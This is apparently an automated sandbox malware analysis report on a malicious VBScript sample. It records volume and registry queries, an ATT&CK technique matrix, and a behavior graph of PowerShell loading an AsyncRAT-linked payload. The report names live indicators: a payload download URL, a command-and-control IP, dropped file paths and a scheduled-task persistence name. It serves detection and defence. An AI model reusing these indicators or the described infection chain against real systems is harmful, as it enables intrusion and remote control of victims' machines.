        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: Yara matchFile source: 0000000D.00000002.3418123386.0000000003431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.3391172871.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1524, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6100, type: MEMORYSTR
        Source: RegSvcs.exe, 0000000D.00000002.3429100433.0000000005A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information222
        Scripting
        Valid Accounts1
        Windows Management Instrumentation
        222
        Scripting
        1
        DLL Side-Loading
        1
        Disable or Modify Tools
        OS Credential Dumping1
        File and Directory Discovery
        Remote Services1
        Archive Collected Data
        1
        Ingress Tool Transfer
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution
        1
        DLL Side-Loading
        212
        Process Injection
        12
        Obfuscated Files or Information
        LSASS Memory13
        System Information Discovery
        Remote Desktop ProtocolData from Removable Media11
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts12
        Command and Scripting Interpreter
        2
        Scheduled Task/Job
        2
        Scheduled Task/Job
        1
        Software Packing
        Security Account Manager121
        Security Software Discovery
        SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Standard Port
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts2
        Scheduled Task/Job
        Login HookLogin Hook1
        DLL Side-Loading
        NTDS2
        Process Discovery
        Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud Accounts3
        PowerShell
        Network Logon ScriptNetwork Logon Script1
        Masquerading
        LSA Secrets21
        Virtualization/Sandbox Evasion
        SSHKeylogging3
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Modify Registry
        Cached Domain Credentials1
        Application Window Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
        Virtualization/Sandbox Evasion
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
        Process Injection
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532152 Sample: H#0813-186765.vbs Startdate: 12/10/2024 Architecture: WINDOWS Score: 100 64 varietydirectoutlet.com 2->64 68 Suricata IDS alerts for network traffic 2->68 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 10 other signatures 2->74 10 wscript.exe 1 2->10         started        13 wscript.exe 1 2->13         started        15 wscript.exe 2->15         started        signatures3 process4 signatures5 88 VBScript performs obfuscated calls to suspicious functions 10->88 90 Suspicious powershell command line found 10->90 92 Wscript starts Powershell (via cmd or directly) 10->92 94 3 other signatures 10->94 17 powershell.exe 14 54 10->17         started        22 cmd.exe 1 13->22         started        24 cmd.exe 15->24         started        process6 dnsIp7 62 varietydirectoutlet.com 122.201.127.73, 443, 49720 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 17->62 56 C:\ProgramData\Cloud\cloud.vbs, ASCII 17->56 dropped 58 C:\ProgramData\Cloud\cloud.ps1, ASCII 17->58 dropped 60 C:\ProgramData\Cloud\cloud.bat, Unicode 17->60 dropped 76 Uses schtasks.exe or at.exe to add and modify task schedules 17->76 78 Loading BitLocker PowerShell Module 17->78 26 conhost.exe 17->26         started        28 schtasks.exe 1 17->28         started        80 Suspicious powershell command line found 22->80 82 Wscript starts Powershell (via cmd or directly) 22->82 84 Uses cmd line tools excessively to alter registry or file data 22->84 30 cmd.exe 1 22->30         started        33 conhost.exe 22->33         started        35 reg.exe 1 1 22->35         started        37 reg.exe 1 1 22->37         started        39 cmd.exe 24->39         started        41 conhost.exe 24->41         started        43 2 other processes 24->43 file8 signatures9 process10 signatures11 100 Suspicious powershell command line found 30->100 102 Wscript starts Powershell (via cmd or directly) 30->102 45 powershell.exe 13 30->45         started        48 powershell.exe 39->48         started        process12 signatures13 96 Writes to foreign memory regions 45->96 98 Creates a thread in another existing process (thread injection) 45->98 50 RegSvcs.exe 2 45->50         started        54 RegSvcs.exe 48->54         started        process14 dnsIp15 66 88.119.175.153, 53510, 9999 IST-ASLT Lithuania 50->66 86 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 50->86 signatures16

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        H#0813-186765.vbs5%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
        https://github.com/Pester/Pester1%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        varietydirectoutlet.com
        122.201.127.73
        truefalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://varietydirectoutlet.com/redro/sasa.giffalse
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2355212924.000001CC10071000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2332057213.000001CC0043D000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2332057213.000001CC00227000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://varietydirectoutlet.compowershell.exe, 00000002.00000002.2332057213.000001CC00227000.00000004.00000800.00020000.00000000.sdmpfalse
              unknown
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2332057213.000001CC0043D000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://go.micro/fwlink/?LinkId=powershell.exe, 00000002.00000002.2373810622.000001CC6F316000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2332057213.000001CC00227000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://go.micropowershell.exe, 00000002.00000002.2373810622.000001CC6F316000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2332057213.000001CC0043D000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://contoso.com/powershell.exe, 00000002.00000002.2355212924.000001CC10071000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2355212924.000001CC10071000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://contoso.com/Licensepowershell.exe, 00000002.00000002.2355212924.000001CC10071000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://contoso.com/Iconpowershell.exe, 00000002.00000002.2355212924.000001CC10071000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://aka.ms/pscore68powershell.exe, 00000002.00000002.2332057213.000001CC00001000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2332057213.000001CC00001000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3418123386.0000000003431000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2332057213.000001CC00227000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://www.microsoft.coyZpowershell.exe, 00000002.00000002.2371780956.000001CC6F208000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  88.119.175.153
                  unknownLithuania
                  61272IST-ASLTtrue
                  122.201.127.73
                  varietydirectoutlet.comAustralia
                  38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUfalse
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1532152
                  Start date and time:2024-10-12 16:38:10 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 2s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:23
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:H#0813-186765.vbs
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winVBS@34/36@1/2
                  EGA Information:
                  • Successful, ratio: 66.7%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 47
                  • Number of non-executed functions: 1
                  Cookbook Comments:
                  • Found application associated with file extension: .vbs
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 4844 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  TimeTypeDescription
                  10:39:16API Interceptor104x Sleep call for process: powershell.exe modified
                  10:40:17API Interceptor899991x Sleep call for process: RegSvcs.exe modified
                  16:39:30Task SchedulerRun new task: Cloud OneDrive path: C:\ProgramData\Cloud\cloud.vbs
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  88.119.175.153#9948-8465.vbsGet hashmaliciousAsyncRATBrowse
                    AG#976832.vbsGet hashmaliciousAsyncRATBrowse
                      C-SSA#876-245.vbsGet hashmaliciousAsyncRATBrowse
                        122.201.127.73Yeni sipari#U015f _No.129099, pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.grandviewhighlands.com/qort/?6lLHRdG=BInxrnWoS6xwvmJQUXxoFoaRFm+I3ipks28Y5Ty51qvxXwCHpO7mvqTSYDLC9xGXk5gV&XX=5jPLWvY0vxztgx
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUhttps://url.avanan.click/v2/r01/___https://www.google.com.sg/zwq?v=7WZIz&why=7WZIz&xf=y&jxwh=7WZIz&xtzwhj=&hi=7WZIz&zfhy=&zwq=frudxdjAjsynslgfxj.htr.fzd.oflfd___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzo5MTJhYWJjZjBjZWQ3YTE3MzliOWViMjI2OTgzNmFjODo3OmFiMTk6M2MwNmNjYzRlYzBhY2Q2MTg4MWQ5YTMxZDNlZTRiZmFmOTNhMjg1NDIzMDkzM2QyMzQ2MzYzY2Q5NzJhMDgxYTpoOlQ6VA#cnlhbkBsaW5jb2xubWFpbmVmY3UuY29tGet hashmaliciousUnknownBrowse
                        • 163.47.73.97
                        http://share581680880819.mycls.com.au/109533386504871408407795xbixgen-pgx-211995313699-ifxcvittoria-isxbgcg.orgsf-1038183551929Get hashmaliciousUnknownBrowse
                        • 203.170.87.17
